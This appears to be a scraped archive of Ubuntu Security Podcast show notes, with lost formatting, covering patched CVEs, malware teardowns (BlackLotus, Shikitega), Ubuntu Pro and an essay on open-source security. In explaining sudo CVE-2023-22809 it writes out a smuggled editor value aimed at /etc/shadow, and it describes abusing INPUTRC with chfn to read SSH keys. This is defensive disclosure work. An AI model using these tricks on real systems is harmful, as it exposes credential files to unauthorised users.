SSL option)intel-microcode
, nvme-cli
, various graphics drivers etc)io_uring
The release of Ubuntu 23.04 Lunar Lobster is nigh so we take a look at some of the things the security team has been doing along the way, plus it’s our 6000th USN so we look back at the last 19 years of USNs whilst covering security updates for the Linux kernel, Emacs, Irssi, Sudo, Firefox and more.
109 unique CVEs addressed
malloc()
/ free()
- would then trigger the memory checking of libc
which detected thissudoreplay
(can
be used to list or play back the commands executed in a sudo session) - and so
could allow an attacker to get code execution as the user running sudoreplay
by injecting terminal control characters.desktop
files - could allow an attacker to get code execution as
the user running firefox - interesting to note that as a snap, firefox is
confined by default and cannot execute arbitrary commands from the host
system - can only use binaries from within the firefox
snap itself or the
user’s $HOME
which makes exploitation of such an issue harder since less
LOLBins to make use ofio_uring
mediation support in AppArmordm-verity
within snapd for
improved integrity of snapsUbuntu gets pwned at Pwn2Own 2023, plus we cover security updates for vulns in GitPython, object-path, amanda, url-parse and the Linux kernel - and we mention the recording of Alex’s Everything Open 2023 presentation as well.
91 unique CVEs addressed
mod_proxy
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 |
---|---|---|---|---|
aws | 93.1 | 93.1 | 93.1 | — |
aws-5.15 | — | 93.1 | — | — |
aws-5.4 | — | — | 93.1 | — |
aws-hwe | — | — | — | 93.1 |
azure | 93.1 | 93.1 | — | 93.1 |
azure-4.15 | — | — | 93.1 | — |
azure-5.4 | — | — | 93.1 | — |
gcp | 93.2 | 93.1 | — | 93.1 |
gcp-4.15 | — | — | 93.1 | — |
gcp-5.15 | — | 93.2 | — | — |
gcp-5.4 | — | — | 93.1 | — |
generic-4.15 | — | — | 93.1 | 93.1 |
generic-5.4 | — | 93.1 | 93.1 | — |
gke | 93.2 | 93.1 | — | — |
gke-4.15 | — | — | 93.1 | — |
gke-5.15 | — | 93.2 | — | — |
gke-5.4 | — | — | 93.1 | — |
gkeop | — | 93.1 | — | — |
gkeop-5.4 | — | — | 93.1 | — |
ibm | 93.1 | 93.1 | — | — |
linux | 93.1 | — | — | — |
lowlatency-4.15 | — | — | 93.1 | 93.1 |
lowlatency-5.4 | — | 93.1 | 93.1 | — |
oem | — | — | 93.1 | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
io_uring
and large attack surfaces through unprivileged user
namespaces perhaps make Ubuntu more of an easy target
Ubuntu is one of the most popular Linux distributions and is used by millions of people all over the world. It contains software from a wide array of different upstream projects and communities across a number of different language ecosystems. Ubuntu also aims to provide the best user experience for consuming all these various pieces of software, whilst being both as secure and usable as possible.
The Ubuntu Security team is responsible for keeping all of this software secure and patched against known vulnerabilities, as well as proactively looking for new possible security issues, and finally for ensuring the distribution as a whole is secured through proactive hardening work. They also have a huge depth of experience in working with upstream open source projects to report, manage patch and disclose security vulnerabilities. Find out both how they keep Ubuntu secure and how you can improve the security of your own open source project or the projects you contribute to.
This week saw the unexpected release of Ubuntu 20.04.6 so we go into the detail behind that, plus we talk Everything Open and we cover security updates including Emacs, LibreCAD, Python, vim and more.
82 unique CVEs addressed
file
on it - but would fail to escape the filename - so if a user
could be tricked into running htmlfontify-copy-and-link-dir
on a crafted
directory, could get code execution in the context of emacsmail
command - original
patch didn’t fix properly so second CVE was issued for the fixurllib.parse()
simply by prefixing the URL
with a space - blocklisting is not part of upstream functionality but often
would be implemented in application / library logic by first using urlparse()
to parse the given URL - if prefixed with a space then can get urlparse()
to
fail to return the correct scheme/hostname - can workaround simply by first
calling strip()
on URL - apparently upstream still discussing whether the
current fix is sufficient so watch this spaceUnlike previous point releases, 20.04.6 is a refresh of the amd64 installer media after recent key revocations, re-enabling their usage on Secure Boot enabled systems.
Many other security updates for additional high-impact bug fixes are also included, with a focus on maintaining stability and compatibility with Ubuntu 20.04 LTS.
cat /sys/firmware/efi/efivars/SbatLevelRT-605dab50-e046-4300-abb6-3dd810dd8b23
sbat,1,2022052400
grub,2
objdump -j .sbat -s grubx64.efi
The Ubuntu Security Podcast is on a two week break to focus on Everything Open 2023 in Melbourne next week - come hear Alex talk about Securing a distribution and securing your own open source project in person if you can.
This week we dive into the BlackLotus UEFI bootkit teardown and find out how this malware has some roots in the FOSS ecosystem, plus we look at security updates for the Linux kernel, DCMTK, ZoneMinder, Python, tar and more.
111 unique CVEs addressed
shim
and grub
- but not because they are exploiting any vulnerabilities in them,
but since they are very useful components if you want to boot your own
bootkitshim
and grub
) - but also a copy of a vulnerable
version of the Windows Boot Manager UEFI binary plus their own custom boot
configuration data - and since they have disabled BitLocker already these
will happily be loaded at next boot without the usual integrity checks etcgrub
is signed using this key whilst the shim
is Red Hat’s shim
-
unmodified and signed by Microsoft and hence trusted - this will then trust
their malicious grub
as it is signed by the key they just enrolled in the
MOKshim
is an unmodified copy, their grub
is not - and is actually
maliciousshim
then goes on to boot this malicious grub
which starts Windows but also
installs a bunch of UEFI memory hooks to be able to subvert further stages
of the boot process and eventually Windows itselfshim
in the future - perhaps, but it is not really shim
that
is at fault here - the issue is the original vulnerability in the Windows
Boot Manager - shim
just helps to make loading additional parts of their
bootkit easier (along with grub
) - so hopefully Microsoft don’t go down that
pathshim
’s did get revoked - but
revoking this Microsoft binary would mean many older systems may fail to
boot, including their recovery images and install media etcThis week the common theme is vulnerabilities in setuid-root binaries and their
use of environment variables, so we take a look at a great blog post from the
Trail of Bits team about one such example in the venerable chfn
plus we look at
some security vulnerabilities in, and updates for the Linux kernel, Go Text, the
X Server and more, and finally we cover the recent announcement of Ubuntu
22.04.2 LTS.
75 unique CVEs addressed
PATH
environment variable could get it to
execute their binaries instead - particularly could be an issue if a setuid()
binary uses libxpm - and this is mentioned in the glibc manual around tips for
writing setuid programschfn
as
implemented by the util-linux
package - used the readline
library for input
handling by many CLI applications - as a result, able to be abused to read the
contents of a root-owned SSH private keychfn
binary (which is used to set info about the current user in
/etc/shadow
) would use the readline library just to read input from the user -
by default readline
will parse its configuration from the INPUTRC
environment
variableINPUTRC
to point to that file and execute chfn
and it will then go parse
that - however, the file first has to appear close to the format which is
expected - and it just so happens that SSH private keys fit this billchfn
comes from the
standalone passwd
package, not util-linux
- and the chfn
from passwd
didn’t
use readline
gnome-initial-setup
- previously this
was only Livepatch, but can now enable any of the Ubuntu Pro offerings as
soon as you log in for the first time.After the announcement of Ubuntu Pro GA last week, we take the time to dispel some myths around all things Ubuntu Pro, esm-apps and apt etc, plus Camila sits down with Mark and David to discuss the backstory of Editorconfig CVE-2023-0341 and we also have a brief summary of the security updates from the past week.
https://www.theregister.com/2022/10/13/canonical_ubuntu_ad/
https://www.omgubuntu.co.uk/2022/10/ubuntu-pro-terminal-ad
https://news.ycombinator.com/item?id=33260896
But there has been a lot of users expressing a lot of emotion over the appearance now of the new ‘advertisement’ for Ubuntu Pro / esm-apps when they run apt update, e.g.:
The following security updates require Ubuntu Pro with 'esm-apps' enabled:
python2.7-minimal python2.7 libpython2.7-minimal libpython2.7-stdlib
Learn more about Ubuntu Pro at https://ubuntu.com/pro
There appears to be a few main issues:
So let’s take some time to look into these issues:
pro config set apt_news False
esm-apps
part of this message indicates that
these updates are for packages in the Universe component of the Ubuntu
archive - previously this has only ever been community supported - and
so the Ubuntu Security team would only ever provide security updates on
rare occasions OR if a member of the community came along and provided
an update in the form of a debdiff which could be sponsored by someone
from the Ubuntu Security team64 unique CVEs addressed
The Ubuntu Security Podcast is back for 2023! We ease into the year with coverage of the recently announced launch of Ubuntu Pro as GA, plus we look at some recent vulns in git, sudo, OpenSSL and more.
212 unique CVEs addressed
.gitattributes
SUDO_EDITOR
,
VISUAL
or EDITOR
- these would normally specify the binary of the editor to
use--
EDITOR=vim -- /etc/shadow
- then when sudoedit
launches the editor for the originally specified file, would also launch it
with this file too/etc/sudoers
- ie since
could be configured to only allow a user to edit say the apache config via
sudoeditThe following security updates require Ubuntu Pro with 'esm-apps' enabled:
python2.7-minimal python2.7 libpython2.7-minimal libpython2.7-stdlib
Learn more about Ubuntu Pro at https://ubuntu.com/pro
For our final episode of 2022, Camila is back with a special holiday themed discussion of the security of open source code, plus we hint at what is in store for the podcast for 2023 and we cover some recent security updates including Python, PostgreSQL, Squid and more.
54 unique CVEs addressed
3xx
redirect header with a crafted Location could trigger
this bugVary
headerHello listener! It has been a while since I last showed up here to share with you some of my thoughts and spread the knowledge, and today I am back in order to try to fix that, remove the void I have left in the hearts of those that enjoy listening to me rambling about a certain cyber security topic. That being said, I recorded my first podcast segment during the holiday season last year, and I thought it would be very poetic to return at the same time this year to record once again. Especially after I was struck with inspiration after spending a little time with my family. Nothing more fitting for this once again holiday episode, considering it is the time of the year - the most wonderful one - when we usually enjoy mingling and celebrating with family and friends. The time of the year where we meet in order to eat some good food, spend some quality time together, catch up on life, share the joy… and answer the always asked question by someone who knows you work with computers: “Do you think it’s a virus?”. “Yes, uncle, it probably is, since the link you clicked on that said ‘Free 1000 dollar Christmas vouchers for the first 10 clicks’ is most likely a scam. But hey, I gotta go now, because it is time for some delicious holiday season desserts! Your computer can survive a few more hours doing some cryptomining for some random hacker, so I’ll check on that later for you”. Anyway, surprising as it may be, this actually was not the topic of conversation that brought me here today, although I fully expect the previously mentioned question to come my way whenever I do meet my family for the end of the year festivities of 2022. Instead, I was asked a question that would probably have my holiday treats wait for me a little bit longer, since it is one I find compelling to answer, and one that I thought would be actually interesting to share the answer to, so that you can take it to your holiday meetings as a hot topic of conversation…you know…show off a little bit to the ones you love.
So…to elaborate a little bit more on my story and on this so far mysterious question…while sipping on some delicious cocoa surrounded by some fairy lights and the cold air - even though it is summer during the end of the year where I live…I see you, southern hemisphere. I was traveling when this happened - my dearest not-in-the-IT-field family member asked me the following question while we had a conversation about my job: “how is it possible to have security in a software when the code for that software is available for all to see on the Internet?”. Running a prettify function on this question, we can word it as: “how can open source software be secure if the code is public?”. And that, family and friends, is the question that we wish to answer today. I already answered my family member, but now, I want to do it the fancy way, the holiday spirit way! So gather around with your drinks and delicious appetizers, and before we head for dinner, and of course, dessert, let’s think about the year we leave behind, the code that was a part of it, and why, in the year of 2022, can this code be secure when everyone knows exactly what it is.
Let’s begin this beautiful holiday sharing moment by actually talking about what is open source software and what is NOT open source software, as well as why one would think that the former is less secure than the latter. To keep it simple: open source software is the kind of software where the source code, a.k.a. the instructions that will be transformed into the computer program that you will later use, is publicly available for all to see. Those that wish to do so can inspect this software’s code to know exactly how it does what it does. They can use it freely if following its license terms, and they can even modify it, maybe change its functionalities, be it through creation of a copy of that code that branches from the original version, or be it with authorization from the creator/maintainer of the software to edit the original version wherever it is being maintained. A beautiful example to bring this all together in your mind: almost all software packages in Ubuntu are open source. The programs you run in your Ubuntu OS come from code that is publicly available for all to access through the loveliest Internet. For many packages, it is possible to choose one from main or universe, for example, and find its code in a repository after a quick web search. Even quicker: you can download the source code related to the executables and libraries apt installs in your Ubuntu OS when you run ‘apt-get install <insert-package-name-here>’ by running ‘apt-get source <insert-package-name-here>’ instead. Please remember to replace <insert-package-name-here> with the actual package name if you’re gonna try to do this. Anyway, this package you download with apt may have its code differ a little bit from the original code for that software package, the one maintained by its creator or any successors, also known as the upstream code, and that may happen for various reasons, which I will not go too much further into here, however, to put it directly: this code associated with the package will most likely have its regular upstream maintainers, with a lot of them also accepting contributions from people that might use this software, care about its wellbeing or even…its security, and the source code in an Ubuntu package will be nothing more than a copy of an upstream version that is being contributed to by the Ubuntu teams and the Ubuntu community. Very much in the holiday spirit, one of the ideas of open source is to have people collaborate on software, as well as have software be shared with those that wish to use it, sometimes with changes.
Moving on…on the other side of our coin, we have non-open source software, also known as closed source software, which is software for which the source code is not publicly available for all to inspect, use or modify. Closed source software has its source code protected, with only an authorized group of people - who are usually a part of the organization that developed said software or that is currently maintaining it after taking responsibility for it at a certain point in time - having access to this source code, be it to change the source code or to simply look at it and know what it is. Closed software is usually not free to use and users that wish to have access to the software and its functionalities will only be able to obtain a final executable version of it, where it is very difficult to acquire information on the source…unless you are very determined, but more on that later. For now, know that closed source software will allow you to execute it, but you can’t know what you are executing unless you do some very intense digging. As for an example…let’s put it this way, so that you can fill in the blanks: if Ubuntu is a door and the doors are open, then that must mean that the Windows are … . And there you have your answer. I mean…it is the holiday season and we would rather have our guests come in to celebrate through the door instead of any other way. And I say this because I want you to understand that there is no right or wrong when it comes to open source and closed source, there are only preferences and needs. There are situations where one will be more useful than the other, or where one might be preferred over the other. Who am I to judge if you let people into your house through your window, or your chimney? What actually matters to us here is: why is closed source usually considered something more secure “intuitively” when open source can be just as, or arguably, even more secure? So, let’s try to answer that question, shall we? When you think about wanting to protect something, you think about keeping it hidden, keeping it a secret. Wait…this is not nearly festive enough for a holiday episode. Let’s try again. When you don’t want someone to guess what is going to be the surprise holiday dessert you are serving by the end of dinner, you usually won’t tell them anything about it. You will hide the recipe, cook your dessert following that recipe, but only allow your guests to know what it is and eat it once the time is just right. After all, the holidays are all about each family’s tradition, and I know dessert eating schedules are definitely a part of it for many. Anyway, the point here is…if no one knows what the dessert is and they don’t have access to your house while you cook it, bake it, prepare it in general, they cannot copy this recipe to bring their own version of your dessert to your holiday celebration - or any other holiday celebration, for that matter - and they can only speculate on the ingredients once they eat it. And…since you kept your ingredients and your cooking utensils far away from messy hands while you prepared your dessert, no one can tamper with it, maybe steal a little bite before it is actually complete, or even add a missing ingredient without authorization. You keep your dessert “safe” by actually hiding it, allowing people access only when the final product is complete. As much as I love holiday season analogies, let’s put our cyber security glasses back on and see this situation from the closed source point of view: your recipe is your source code; you preparing the dessert is you editing, building and compiling the code to create an executable program; and this executable program is actually your final holiday dessert.
You’re not sharing your source code, meaning people cannot tamper with it, cannot create a bad copy of it and cannot inspect it in order to figure out possible failures or ways to exploit it. Yes, even I have fallen victim to the “too much sugar” mistake when baking stuff, but sometimes we can try to mask mistakes with other ingredients and no one will ever know…This can also be called security through obscurity, when you rely on secrecy and confidentiality in order to avoid the exposure of weaknesses and the direct targeting that may befall your software. How can a hacker actually exploit my code if they don’t know what the code is? That is the idea behind security through obscurity. I will not get into the details of whether security through obscurity is an effective practice or not, because that is a very intense and polarizing subject, and it is the holiday season…let’s leave the heated discussions for some other time. I will say, however, that it directly clashes with the open source premise, and it is one of the reasons that may be behind the choice of making software closed source. However, even though this might be a way to protect your software from exploitation and from vulnerability discovery, it is not a fool proof technique to avoid the really determined from figuring out what they want when they are trying to hack you. Talking once more about desserts, because they are delicious and a very pleasing analogy to consider…if you have, for example, a friend or family member that is a chef. They go to your holiday dinner party and then eat your dessert, which we will consider here as being a beautiful multilayered trifle. They eat your trifle and because they are so experienced in the art of cooking, they are able to tell all of the ingredients you have in your cream after tasting it. It is not a skill everyone possesses - discovering the trifle recipe is no trifle matter…one might say - and it is not something everyone will be looking forward to do…after all, some of us simply want to eat and enjoy the food, be the ingredients what they may. However, there might just be that someone that is willing and capable to go the extra mile to figure out your recipe…and let me tell you the bad news…there is not much you can do about it, because there is not much you can hide about your dessert if you intend to serve it for people to eat.
The same goes for code. Yes, it is possible to not share the source code of your software, but for a computer to run a software, it needs to follow the instructions that were transformed into the executable program that originated from the source code. So even if the executable does not contain the exact source code, it will contain something that can be extracted and analyzed by the brave and patient. Any program out there can be reverse engineered into its low level code version, and this low level code, mainly created to be machine readable code, when analyzed, will tell you more about what the source code could actually be. You are able to get from the final product to the actual recipe that led you to that product…even if the low level code will be very difficult to analyze and piece together in order to form something similar to what would be the original source code that generated it. But doubt not my friend…there are people out there that are willing to do this, and sometimes these people can be really, really good at it. So that is why security through obscurity can help, as it is one more barrier that a hacker needs to cross in order to be able to possibly tamper with a system, however, it is not an impenetrable one, and it will only stop those lazy enough to cross it…or those that maybe ate too much during dinner already and will pass on dessert.
Aah, holiday season food is delicious, isn’t it? Plus, I’m not the type to pass on dessert, and I am definitely not done talking about them, the holiday spirit and how it all relates to open source code quite yet, so let’s keep going. Hold on to that dessert analogy, because we will bring it back shortly. For now, we move on, understanding one reason why it might seem that closed source is safer or more secure than open source. Especially when you think about one of the main activities performed by the Ubuntu Security team, which is applying patches to vulnerabilities that are constantly being found in the source code of packages that can be installed in Ubuntu, or that are found in the core of Ubuntu, the kernel. Throughout all the seasons, including the holiday season, we fix issues that are being found by people from the community that look into and identify flaws in these packages, sometimes even unintentionally. We can see this as people finding problems with our recipe and pointing them out to us, forcing us to change it so that the end result will be something better, something that all can enjoy. “Hey, you have peanuts here, what about the people who have peanut allergies that will eat this?”…or…“Hey, if this is cooked in the southern hemisphere, where it is hot during the holiday season instead of cold, this rest time for the cream might be too much and it will be too much of a liquid by the time you want to put your trifle in its final container”. And while you listen to all these complaints and look at your recipe book, you might think it is all very annoying…having to change your recipe to fix all these problems…but when you actually think about it…is it not helpful instead? I mean…you don’t wanna kill grandma because you forgot she was allergic to peanuts, do you? Had you not made your recipe public, you might have not discovered that you had to change it…the bad way: by having grandma spit that trifle all over the floor and scold you because grandma might fall for phishing scams from time to time, but she knows better than to eat hidden peanuts in your trifle. Also…this is a podcast with positive vibes, so let’s not actually consider the worst of the worst situation here for grandma and for you as well… but you get the point.
Do not kid yourself by thinking that closed source software has less bugs than open source software. They might be encountered at a smaller rate, since analysis of the source code is something harder to do and can only be done by people with access to the code, however, they are there…and sometimes, people figure this out in the worst way possible: when they have already been hacked. And then it is a race to figure out where the bug that caused the issue is, so that it can be fixed. By making the source code public, people that are willing to help and are willing to make this code better, safer and more robust have the chance to actively participate in its development and improve the overall final product. One of the reasons why open source software came to be was exactly to provide users with more security, since it is easier to find hidden problems in that which has a lot of people auditing AND it is also easier to trust that which you can audit. Imagine if your prankster cousin wants to tamper with your dessert, and they add an extra bad ingredient to the recipe without your knowledge after you leave them a while with your recipe book…after all, you also need to prepare your holiday dinner. Anyway, if you had decided to hide your dessert recipe from everyone, people would only know something was incredibly wrong once they would have eaten it. Of course, if you were hiding it from everyone, you would have also hidden it from your prankster cousin and not shown them the recipe in the first place, but they could have just as easily found another way to get to it, and if they did a good job changing the recipe without your knowledge, you might not even know it had been tampered with at all. Shoutout to a well known comedy series in which someone adds some savory food to what is supposed to be a dessert trifle because they thought that was the correct recipe, when it was actually all a misunderstanding. The ones who know, will know… Of course, when you hide your recipe book well enough, it is not expected that the recipe will be tampered with, but sometimes, you yourself are the one doing the tampering…you holiday prankster, you! You want to play a prank on your friends and family during the holidays and decide to add something weird to your dessert. If your recipe is public, however, people are able to check for mistakes, and if they see something that might be a problem to them, they can tell you so that you can fix it, or they can choose to not eat your dessert if you don’t want to act on your apparent mistake. Sure, if you make your recipe public maybe you don’t get to do the prank - which is actually not really nice on your part, considering that you are hosting a holiday party to entertain people you love and care about - but if you don’t make it public, there might be people who just won’t eat your dessert out of lack of trust in you.
When we talk about source code, we have the same. Being able to check the source code for a program you wish to use will allow you to check if the source code is doing something you don’t see as being secure, or if it is behaving insecurely due to a bug. You can even create your own copy of the source with the changes you find are necessary in order to get to use the software in a way you find acceptable! However, since the code is public and a lot of people end up using it, a community usually builds around it and there are always the ones looking to improve code, fix its bugs, and make it more secure overall, so maybe you won’t even need your own edited copy of the source code, since you can just share your concerns with that community and the issue might be addressed directly in the upstream version of the code. Of course this all depends if the software you are considering has an active upstream and is being properly maintained…that is unfortunately a downside to free and open source software: not all code out there is being properly taken care of…not everyone has the holiday spirit and wants to improve on their dessert recipes. They write it once and just make it available to whoever wants to cook it without any extra additions or mistake corrections. However, fear not, because at least when we are talking about security, information regarding vulnerabilities found in open source code is mostly shared publicly, and, since it is possible to have your own copy of the code to edit, people who have these copies can also edit their own versions to fix issues that were found by other people, be it with their own fixes be it with fixes provided by the upstream developers that maintain the software (when they exist)…as we do with Ubuntu packages! So as you can see, open source truly encompasses the holiday spirit, by allowing people to share and by allowing software to improve under the suggestions of many people. The open source community being a group of friends sitting together to share that holiday dinner, find possible issues and solve them so that next year said dinner can be even more delicious…and maybe even have some extra desserts!
So there you have it, the reason why you don’t need to worry about open source being insecure just because the source code is public. Sure, there is a risk involved with having your code be public, but I had a teacher that once taught me that sometimes it is not about hiding the algorithm, but instead about making it that the algorithm is so well structured that it doesn’t matter that said algorithm is public, since there is simply no way to exploit it. The basic example are the cryptographic algorithms out there that we use to encrypt our data: the algorithms are public, since we need a standard and people need to know how things work in order to implement the standard and use it in their applications, however, it doesn’t matter that they are public and that people know the steps necessary to encrypt or decrypt some plain text, because what matters is that if there is no key, breaking the encryption is simply not achievable in our average lifespan with the average resources. The power of the algorithm is in the way it works, the math and the theory that support it, and not in its visibility. Everyone can look at the algorithm, and its security stands strong. So without that key, breaking encryption is nearly impossible. When writing open source code, the idea is to follow this same premise: write good code, in such a way that it doesn’t matter that it is public, because even if it is, it is not exploitable since you programmed it with security in mind. So no…please don’t hardcode passwords into your open source code. That is not secure practice, and that is not open source being secure. Don’t do it in your closed source code…because this is not closed source being secure also!
Strive to write a dessert recipe that is so perfect, that it doesn’t matter if someone tries to tamper with it once it is completed, your dessert will come out delicious every time! Yeah, I see you prankster cousin, trying to turn on the heat to get my trifle to melt. It won’t though because I added gelatine to it…or whatever ingredient is needed to not have cream melt…I’m not a cooking expert…my family and friends definitely know that. Anyway, of course there are problems that you might still come across even when cooking or coding with deliciousness and security in mind. Because there is no dessert that can be saved by you using 3kg of salt instead of 3g of salt on what is supposed to be something sweet, because there is an accidental extra ‘k’ in your recipe…but you get the point, and open source gets the point! Because if your dessert recipe is an open recipe and someone finds this “accidental” 3kgs-of-salt mistake - which happens, we are all human and we make mistakes - they can tell you about it and you can fix it! So buy a recipe notebook that can be left outside and no one can write on it unless they use the special notebook pen which you own the rights to, sign your instructions so that you know which ones are trustworthy, and fix the mistakes you find along the way when people that want to share this amazing thing with you give you a nudge about it. You will then know that you are doing your best to provide people with the best holiday dessert ever, so that everyone can enjoy it together during this special holiday time! Also…you know…secure open source code during the holidays as well!
Well, dearest friends and family, that is all of the holiday spirit I have to share with you today! I wish you all an amazing holiday season, filled with love, joy, open source and lots and lots of security patches! Feel free to share your thoughts about this podcast segment and the topic related to it in any of our social media channels! I hope you enjoyed it, and for now, I bid you all farewell, and until next time! Bye!
Credit to https://www.fesliyanstudios.com for the background music.
This week we cover Mark Esler’s keynote address from UbuCon Asia 2022 on Improving FOSS Security, plus we look at security vulnerabilities and updates for snapd, the Linux kernel, ca-certificates and more.
42 unique CVEs addressed
/tmp
so that its disk
usage etc gets accounted for as part of the normal /tmp
/tmp
is world writable so it is trivial for a user to create the expected
per-snap directory and place their own contents inside that such that they can
have this be executed by snap-confine
during the process of creating this
private /tmp
namespace for the snap - and hence get privilege escalation to root as snap-confine
is suidrename()
systemd-tmpfiles
to create a /tmp/snap-private-tmp/
directory on boot with the appropriate restrictive permissionssnap-confine
can create the per-snap private /tmp
within this without
fear of being interfered with by unprivileged usersio_uring
-> UAF (from Pwn2Own 2022)
ca-certificates
to
mark something as distrusted after a particular date - so instead we have
removed it entirely so all things signed by TrustCor would now not be trusted#ubuntu-security
for discussing this with the teamThis week we look at a recent report from Elastic Security Labs on the global Linux threat landscape, plus we look at a few of the security vulnerabilities patched by the team in the past 7 days.
81 unique CVEs addressed
useradd
that required
newer glibc - broke on older Ubuntu releases so that update has been reverted
for now on those releases - still is in place on Ubuntu 22.04 LTS / 22.10After a longer-than-expected break, the Ubuntu Security Podcast is back, covering some highlights of the various security items planned during the 23.04 development cycle, our entrance into the fediverse of Mastodon, some open positions on the team and some of the details of the various security updates from the past week.
67 unique CVEs addressed
io_uring
-> UAF (from Pwn2Own 2022)CAP_NET_ADMIN
but this can be obtained from
within an unprivileged user namespace
canonical-livepatch status
Kernel type | 22.04 | 20.04 | 18.04 |
---|---|---|---|
aws | 90.3 | 90.2 | — |
aws-5.15 | — | 90.3 | — |
aws-5.4 | — | — | 90.2 |
azure | 90.2 | 90.2 | — |
azure-5.4 | — | — | 90.2 |
gcp | 90.3 | 90.2 | — |
gcp-5.15 | — | 90.3 | — |
gcp-5.4 | — | — | 90.2 |
generic-5.4 | — | 90.2 | 90.2 |
gke | 90.3 | 90.2 | — |
gke-5.15 | — | 90.3 | — |
gke-5.4 | — | — | 90.2 |
gkeop | — | 90.2 | — |
gkeop-5.4 | — | — | 90.2 |
ibm | 90.2 | 90.2 | — |
ibm-5.4 | — | — | 90.2 |
linux | 90.2 | — | — |
lowlatency | 90.2 | — | — |
lowlatency-5.4 | — | 90.2 | 90.2 |
/dev/shm
and
the other around the handling of UNIX domain sockets - could be combined
together with another unspecified vulnerability in a different component
installed by default on Ubuntu Server 22.04 to achieve privilege escalation to
root - will be interesting to find out what this other vulnerability is in the
futureio_uring
mediationIt’s the release of Ubuntu 22.10 Kinetic Kudu, and we give you all the details on what’s new and improved, with a particular focus on the security features, plus we cover a high priority vulnerability in libksba as well.
39 unique CVEs addressed
sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=1
named
and dig
to allow to implement strict and mutual TLS authenticationUbuntu Pro beta is announced and we cover all the details with Lech Sandecki and Eduardo Barretto, plus we cover security updates for DHCP, kitty, Thunderbird, LibreOffice, the Linux kernel, .NET 6 and more.
49 unique CVEs addressed
2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
2 different DoS against ISC DHCP server
which would fail to properly decrement a reference count and hence eventually could overflow the reference counter -> abort -> DoS
AuthorizedKeysCommand
and AuthorizedPrincipalsCommand
and so would run these
with group membership of the sshd process itself (even if configured to run as
a different user)x*** [USN-5667-1] Linux kernel vulnerabilities [08:01]
io_uring
UAFFiner grained control for unprivileged user namespaces is on the horizon for Ubuntu 22.10, plus we cover security updates for PCRE, etcd, OAuthLib, SoS, Squid and more.
37 unique CVEs addressed
cjpeg
utility - crafted file with a valid Targa header but incomplete
data - would keep trying pixel after reaching EOF - internally used getc()
which returns the special value EOF
when the end of file is reached - this is
actually -1
but requires the caller to check for this special value - if not,
would interpret this as pixel data (all bits set -> 255,255,255 -> white)
resulting in JPEG file that was possibly thousands of times bigger than the
input file - fixed to use existing input routines to read the data which
already check for EOF
conditionhttp.server
through a URI which has multiple /
at the
beginning - a URI such as //path
gets treated as an absolute URI rather than a
path - could then end up sending a 301
location header with a misleading targetsosreport
- used to gather details of a system etc for debug/analysissudo sysctl kernel.unprivileged_userns_clone=0
apparmor
package tooYou can’t test your way out of security vulnerabilities (at least when writing your code in C), plus we cover security updates for Intel Microcode, vim, Wayland, the Linux kernel, SQLite and more.
68 unique CVEs addressed
x*** [USN-5624-1] Linux kernel vulnerabilities [07:05]
Alex talks with special guests Nishit Majithia and Matthew Ruffell about a recent systemd regression on Ubuntu 18.04 LTS plus we cover security updates for Dnsmasq, the Linux kernel, poppler, .NET 6, rust-regex and more.
28 unique CVEs addressed
On this week’s episode we dive into the Shikitega Linux malware report from AT&T Alien Labs, plus we cover security updates for the Linux kernel, curl and Zstandard as well as some open positions on the team. Join us!
13 unique CVEs addressed
NAME=VALUE
pairs using ASCII chars for both/bin/sh
- from this shell it then attempts to
run commands to exploit two known privesc vulns - CVE-2021-4034
([USN-5252-1, USN-5252-2] PolicyKit vulnerability from Episode 147) and
CVE-2021-3493 ([USN-4916-2] Linux kernel vulnerability in Episode 113)An increased rate of CVEs in curl is a good thing, and we’ll tell you why, plus we cover security updates for the Linux kernel, Firefox, Schroot, systemd and more.
37 unique CVEs addressed
#!/bin/bash
for d in $(curl -s "https://ubuntu.com/security/cves.json?order=newest&package=curl&limit=100" | jq -r ".cves[].published"); do
date +%s -d "$d";
done > curlhist
#!/usr/bin/gnuplot
binwidth = 60*60*24*365 # ~30days in seconds
bin(x,width)=width*floor(x/width) + width/2.0
set xdata time
set datafile missing NaN
set boxwidth binwidth
set xtics format "%Y" time rotate
set style fill solid 0.5 # fill style
set title 'Frequency of curl CVEs in the Ubuntu CVE Tracker by year'
plot 'curlhist' using (bin($1,binwidth)):(1.0) \
smooth freq with boxes notitle
This week we cover the debate around the decision in Ubuntu 22.10 to disable presenting platform security assessments to end users via GNOME, plus we look at security updates for zlib, PostgreSQL, the Linux kernel, Exim and more.
12 unique CVEs addressed
inflateGetHeader()
function so not everything that uses zlib would be
affected - impact is DoS via crashsender_host_name
so unlikely to affect
most installations fwupdmgr security
The HSI specification is not yet complete. To ignore this warning, use --force
This week we take a look at the recent announcement of .NET 6 for Ubuntu 22.04 LTS, plus we cover security updates for the Linux kernel, Booth, WebKitGTK, Unbound and more.
24 unique CVEs addressed
CAP_NET_ADMIN
which is privileged, but
with unprivileged user-namespaces this is trivial - so can mitigate
this by disabling unpriv userns - but this may then affect applications
like Google Chrome and others which use this to setup their sandboxes
etcsudo sysctl kernel.unprivileged_userns_clone=0
Transfer-Encoding
- but would only process
the first - could then allow the second to be misinterpreted by other
proxies etc which could then be used for a request smuggling attackauthfile
directive in its config file, allowing sites / nodes
which did not have the correct auth key to communicate with nodes that
did - oops… - upstream refactored code previously which introduced this
vuln - reverted the refactor to fix thisdotnet6
package in Ubuntu contains the .NET 6 SDK - so can do .NET
development on Ubuntuaspnet
104MB
cf. apsnet:6.0-alpine
100MB
)musl
) and has other differences tooFinally, Ubuntu 22.04.1 LTS is released and we look at how best to upgrade, plus we cover security updates for NVIDIA graphics drivers, OpenJDK, Django, libxml, the Linux kernel and more.
52 unique CVEs addressed
r
and s
and these are used to then perform a bunch of
calculations to check it is valid - this involves comparing r
against r
multiplied by a value derived from s
- so if r
and s
are both zero you
effectively check 0 = 0
Content-Disposition
header of a FileResponse
object based on a filename which is derived from
user input - fixed to escape the filename so can’t then inject content
into the Content-Disposition
headerX-Client-IP
header to WSGI
applications, even when
it came from an untrusted proxy and hence could allow unintended access
to servicesnewRows
parameterCTRL + ALT + F2
sudo do-release-upgrade
This week we dig into what community sponsored security updates are all about, plus Ubuntu 22.04.1 LTS gets delayed by a week and we cover security updates for MySQL, the Linux kernel, Samba, Net-SNMP and more.
75 unique CVEs addressed
CAP_NET_ADMIN
(which can be done via mapping to root in an unprivileged user
